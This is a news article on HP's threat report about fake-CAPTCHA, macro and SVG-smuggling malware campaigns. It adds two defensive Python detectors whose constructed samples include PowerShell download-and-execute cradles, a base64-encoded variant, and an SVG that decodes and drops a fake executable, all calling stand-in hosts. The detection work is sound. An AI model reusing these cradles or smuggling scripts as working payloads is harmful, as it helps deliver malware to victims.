At its Amplify Conference today, HP Inc. unveiled its latest HP Threat Insights Report, revealing how attackers are increasingly exploiting everyday security measures—like CAPTCHA verification—to infect devices with malware.
According to the report, shared with the Byteline, data from millions of endpoints running HP Wolf Security between October and December 2024 shows a rise in attacks that capitalize on what the company calls “click tolerance”: users' growing habit of clicking through multi-step authentication prompts without stopping to think.
One alarming trend identified is the use of fake CAPTCHAs as a gateway for malware infections. In a campaign dubbed “CAPTCHA Me If You Can”, attackers tricked users into completing bogus CAPTCHA tests hosted on malicious websites.
Believing they were simply proving they were human, victims were walked through running a PowerShell command on their own machine, which downloaded and installed Lumma Stealer, an information stealer that siphons off credentials and other sensitive data from the infected host.
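HP's report describes the outcome of the fake-CAPTCHA campaign (the victim runs a PowerShell download command) but not the detection side. The following is an added example, not HP's code, of the check a SOC would run over process-creation telemetry. It assumes a ClickFix-style chain in which the victim pastes the command into the Windows Run dialog or an Explorer window, so the PowerShell process has explorer.exe as its parent; the field names (Image, ParentImage, CommandLine), the sample events and the URLs are all constructed for the example.

```python
import base64
import re

# Command-line indicators of a PowerShell download cradle or an evasion flag.
# Matching is done on the lower-cased command line plus any decoded
# -EncodedCommand payload, so base64 wrapping does not hide the cradle.
CRADLE_PATTERNS = {
    "invoke-expression": r"\b(?:iex|invoke-expression)\b",
    "web-request": r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b",
    "webclient-download": r"\bnet\.webclient\b|downloadstring|downloadfile",
    "hidden-window": r"-w(?:in|indowstyle)?\s+hidden",
    "encoded-command": r"-e(?:nc|ncodedcommand|c)?\s+[a-z0-9+/=]{20,}",
    "bypass-policy": r"-e(?:p|xecutionpolicy)\s+bypass",
}
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Parents that mean a human typed or pasted the command (Run dialog, Explorer)
# rather than a script, scheduler or build tool launching PowerShell. Assumption
# for this example: a ClickFix-style lure ends up with explorer.exe as parent.
INTERACTIVE_PARENTS = {"explorer.exe"}


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand argument, or '' if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError: malformed base64
        return ""


def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def classify(event: dict) -> dict:
    """Classify one process-creation event.

    verdict is "clickfix-suspect" (PowerShell with cradle indicators launched from
    an interactive parent), "cradle-review" (cradle indicators, other parent) or
    "benign". indicators lists the matched CRADLE_PATTERNS names.
    """
    cmd = event.get("CommandLine", "")
    haystack = (cmd + " " + decode_encoded_command(cmd)).lower()
    indicators = [name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, haystack)]
    is_powershell = _basename(event.get("Image", "")) in {"powershell.exe", "pwsh.exe"}
    interactive = _basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS
    if is_powershell and indicators and interactive:
        verdict = "clickfix-suspect"
    elif is_powershell and indicators:
        verdict = "cradle-review"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": indicators}


# Constructed sample events (not real telemetry); fields mirror the usual
# Image / ParentImage / CommandLine process-creation schema.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0. Pasted cradle: hidden window, fetch-and-eval.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"'},
    # 1. Same intent, wrapped in -EncodedCommand.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -ep bypass -enc " + encode_command(
         "(New-Object Net.WebClient).DownloadString('https://example.invalid/x') | iex")},
    # 2. Developer tooling running a local script: no cradle indicators.
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe", "Image": PS,
     "CommandLine": "powershell -File build.ps1"},
    # 3. A user opening an interactive shell from Explorer: same parent, no indicators.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},
]


def triage(events):
    """Return (index, verdict, indicators) for every event that is not benign."""
    out = []
    for i, ev in enumerate(events):
        r = classify(ev)
        if r["verdict"] != "benign":
            out.append((i, r["verdict"], r["indicators"]))
    return out


if __name__ == "__main__":
    for i, verdict, inds in triage(SAMPLE_EVENTS):
        print(f"event {i}: {verdict} {inds}")
```

The parent-process condition is what keeps the rule quiet on build servers and admin scripts that legitimately download with Invoke-WebRequest; events 2 and 3 show both halves of that trade-off. Decoding -EncodedCommand before matching matters because the encoded form is the cheapest obfuscation an attacker can apply, and it defeats a naive string match on the raw command line.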
Another attack vector observed by HP's researchers involved XenoRAT, an open-source remote access trojan that can switch on a victim's webcam and microphone. In this campaign the attackers relied on social engineering: Word and Excel attachments carrying malicious macros, with the lure written to persuade recipients to enable the macros and so hand the attackers control of the device.
HP also warned of a technique known as SVG smuggling, in which attackers embed malicious JavaScript inside SVG image files. SVG is an XML-based format that may legitimately carry script, and on a typical Windows machine an .svg file is opened by the default web browser, so the embedded code runs as soon as the image is rendered, without raising suspicion.
In one instance, seven different payloads, including info stealers and additional RATs, were delivered this way. The attackers also used obfuscated Python scripts later in the infection chain, a tactic that works because a Python interpreter is already present on many machines, increasingly so with the spread of AI and data-science tooling.
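HP's report names the SVG smuggling technique without showing what a scanner looks for. The following is an added example, not HP's code, of a static check for script-bearing SVG content: it parses the XML and flags script elements, inline event handlers, javascript: or data: links, and long base64 runs inside scripts, which it decodes and type-sniffs. The four sample files are constructed for the example; the atob-to-Blob-to-download pattern in the smuggling sample is the generic HTML smuggling idiom, not a reconstruction of the campaign HP observed, and the fake PE payload is just an "MZ" header with filler bytes.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample files (not real samples). The smuggling one uses the
# generic atob -> Blob -> object URL pattern to drop a file from script.
FAKE_PE = base64.b64encode(b"MZ" + b"\x90" * 40).decode("ascii")  # fake PE header plus filler

BENIGN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
    '<circle cx="50" cy="50" r="40" fill="steelblue"/></svg>'
)
SMUGGLING_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/>'
    '<script><![CDATA['
    'var b = "' + FAKE_PE + '";'
    'var bytes = Uint8Array.from(atob(b), function (c) { return c.charCodeAt(0); });'
    'var url = URL.createObjectURL(new Blob([bytes]));'
    'var a = document.createElement("a"); a.href = url; a.download = "invoice.exe"; a.click();'
    ']]></script></svg>'
)
ONLOAD_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" onload="fetch(\'https://example.invalid/c\')">'
    '<rect width="10" height="10"/></svg>'
)
LINK_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<a xlink:href="javascript:void(0)"><text x="5" y="15">open</text></a></svg>'
)

# Elements that let an SVG host foreign (HTML) content or external objects.
RISKY_ELEMENTS = {"foreignobject", "iframe", "embed", "object"}
# A long base64 run inside a script is the classic smuggling carrier.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def local_name(qualified: str) -> str:
    """ElementTree renders namespaced names as '{uri}name'; keep only 'name'."""
    return qualified.rsplit("}", 1)[-1].lower()


def describe_payload(data: bytes) -> str:
    """Sniff a few file types that smuggled payloads commonly turn out to be."""
    if data.startswith(b"MZ"):
        return "PE executable"
    if data.startswith(b"PK\x03\x04"):
        return "ZIP archive"
    if data.startswith(b"%PDF"):
        return "PDF document"
    try:
        return "text: " + data.decode("utf-8")[:40]
    except UnicodeDecodeError:
        return f"{len(data)} bytes of binary data"


def scan_svg(svg_text: str):
    """Return a list of (finding, detail) pairs for script-bearing content in an SVG.

    xml.etree is used to keep the example stand-alone; when scanning untrusted
    files in production, parse with defusedxml to rule out entity-expansion attacks.
    """
    findings = []
    root = ET.fromstring(svg_text)
    for elem in root.iter():  # document order, root included
        name = local_name(elem.tag)
        body = elem.text or ""
        if name == "script":
            findings.append(("script-element", body.strip()[:60]))
            for blob in B64_BLOB.findall(body):
                try:
                    data = base64.b64decode(blob, validate=True)
                except ValueError:
                    continue  # not valid base64 after all
                findings.append(("embedded-payload", describe_payload(data)))
        elif name in RISKY_ELEMENTS:
            findings.append(("risky-element", name))
        for attr, value in elem.attrib.items():
            aname = local_name(attr)  # strips the xlink namespace from xlink:href
            if aname.startswith("on"):
                findings.append(("event-handler", f"{aname}={value[:60]}"))
            elif aname in {"href", "src"} and value.strip().lower().startswith(("javascript:", "data:")):
                findings.append(("scripted-link", value[:60]))
    return findings


def is_suspicious(svg_text: str) -> bool:
    return bool(scan_svg(svg_text))


if __name__ == "__main__":
    for label, svg in [("benign", BENIGN_SVG), ("smuggling", SMUGGLING_SVG),
                       ("onload", ONLOAD_SVG), ("link", LINK_SVG)]:
        print(label, scan_svg(svg))
```

A mail gateway that treats .svg as "just an image" is exactly what this technique relies on; running a check like this on SVG attachments, or simply changing the file association so .svg no longer opens in a browser, removes the execution step the campaign needs. The base64 decoding is deliberately tolerant of junk matches (a failed decode is skipped), because obfuscated scripts often contain long identifier-like strings that are not payloads.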
“A common thread across these campaigns is the use of obfuscation and anti-analysis techniques to slow down investigations,” said Patrick Schläpfer, Principal Threat Researcher at HP Security Lab. “Simple, effective evasion methods can give attackers a crucial time advantage, making intrusions harder to detect and contain.”
The report also found that at least 11% of email threats detected by HP’s Sure Click feature had bypassed one or more standard email gateway scanners. Executables accounted for 43% of malware deliveries, followed by 32% via archive files.
Dr. Ian Pratt, Global Head of Security for Personal Systems at HP, emphasized the growing risk as cyberattacks evolve alongside user behavior. “Multi-step authentication has become normal, but it’s also increasing our tolerance for clicking through complex processes without thinking. Cyber awareness training is no longer enough.”
“Organizations need to shrink the attack surface by isolating risky actions—so they don’t have to guess what the next threat will be.”
As attackers continue to experiment with new techniques to bypass conventional defenses, HP’s findings serve as a stark reminder that even the most familiar online experiences can be weaponized.